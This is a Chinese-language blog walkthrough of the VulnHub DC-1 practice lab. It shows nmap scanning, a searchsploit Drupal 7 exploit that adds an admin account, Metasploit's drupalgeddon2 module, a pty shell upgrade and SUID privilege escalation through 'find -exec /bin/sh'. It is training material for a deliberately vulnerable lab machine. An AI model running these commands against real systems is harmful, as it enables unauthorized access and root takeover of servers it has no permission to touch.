VulnHub DC-1

 博主介绍

‍ 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
✨主攻领域:【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】
点赞➕评论➕收藏 == 养成习惯(一键三连)
欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋
作者水平有限,欢迎各位大佬指点,相互学习进步!

一、信息收集

1.nmap扫描

发现开放了22算口,开放了ssh服务,OpenSSH 6.0p1
发现开放了80端口,存在web服务,Apache httpd 2.2.22,Drupal 7
发现开放了111端口,开放了rpcbind服务

VulnHub DC-1_第1张图片

打开80端口:

VulnHub DC-1_第2张图片

二、漏洞利用

1.searchsploit

┌──(rootkali)-[~/routing]
└─# searchsploit Drupa 7 

有一个34992.py文件可以添加管理员账户

VulnHub DC-1_第3张图片

┌──(rootkali)-[~/routing]
└─# searchsploit -m 34992.py

复制到文件夹

不建议在本地的漏洞数据库中修改exp,建议使用-m参数复制那些有用的到当前的工作目录

VulnHub DC-1_第4张图片

┌──(rootkali)-[~/routing/Drupal 7]
└─# python 34992.py -t http://192.168.103.188/ -u root -p root

-t 接url   -u 用户名    -p 密码

VulnHub DC-1_第5张图片

2.flag3

VulnHub DC-1_第6张图片

3.msf

msf6 > search Drupal 7

使用exploit/unix/webapp/drupal_drupalgeddon2模块

set rhosts 192.168.103.188

python -c 'import pty; pty.spawn("/bin/bash")'  #交互式shell

VulnHub DC-1_第7张图片

VulnHub DC-1_第8张图片

4.SUID提权

1.查看具有SUID的二进制可执行文件
find / -user root -perm -4000 -print 2>/dev/null

2.一些常用的可以用来提权的可执行文件:
nmap、vim、find、bash、more、less、nano、cp

3.利用find获得root权限
find / -name 已有文件名 -exec "/bin/sh" \;
比如:
find / -name misc -exec "/bin/sh" \;

VulnHub DC-1_第9张图片

VulnHub DC-1_第10张图片

5.flag

VulnHub DC-1_第11张图片

大致就是说你已经通过了本关卡

VulnHub DC-1_第12张图片

你可能感兴趣的:(VulnHub,web,网络,运维,VulnHub,网络安全)